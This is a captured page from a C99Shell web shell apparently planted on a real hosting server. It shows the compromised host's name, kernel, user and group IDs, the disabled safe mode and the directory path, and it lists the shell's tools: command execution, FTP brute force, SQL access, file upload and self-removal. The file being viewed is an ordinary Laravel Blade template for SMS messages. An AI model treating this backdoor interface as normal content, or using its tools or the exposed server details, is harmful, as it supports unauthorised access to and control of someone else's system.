!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/resources/views/customer/settings/   drwxr-xr-x
Free 29.18 GB of 117.98 GB (24.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sms_template.blade.php (1.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<div class="form-group">
    <button class="btn btn-primary float-right mb-3 btn-sm" data-title="Add New Template" type="button" id="addNewTemplate">{{trans('customer.add_template')}}</button>
</div>
<div class="card-body table-responsive p-0 " style="height: 300px;">
    <table class="table table-head-fixed text-nowrap text-center">
        <thead>
        <tr>
            <th>{{trans('customer.title')}}</th>
            <th>{{trans('customer.status')}}</th>
            <th>{{trans('customer.action')}}</th>
        </tr>
        </thead>
        <tbody>
        @if($sms_templates->isNotEmpty())
        @foreach($sms_templates as $sms_template)
        <tr>
            <td>{{$sms_template->title}}</td>
            <td>@if($sms_template->status=='active')
            <span class="badge badge-success">{{$sms_template->status}}</span>
                @else
                    <span class="badge badge-danger">{{$sms_template->status}}</span>
                    @endif
            </td>
            <td><button type="button" data-value="{{json_encode($sms_template->only(['id','title','status','body']))}}" class="btn btn-sm btn-info template-edit">Edit</button>
                <button class="btn btn-sm btn-danger" type="button" data-message="Are you sure you want to delete this template?"
                        data-action="{{route('customer.sms.template.delete',['id'=>$sms_template->id])}}"
                data-input={"_method":"delete"}
                data-toggle="modal" data-target="#modal-confirm">Delete</button>
            </td>
        </tr>
        @endforeach
        @else
            <tr>
                <td></td>
                <td colspan="1">{{trans('customer.no_data_available')}}</td>
            </tr>
            @endif
        </tbody>
    </table>
</div>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--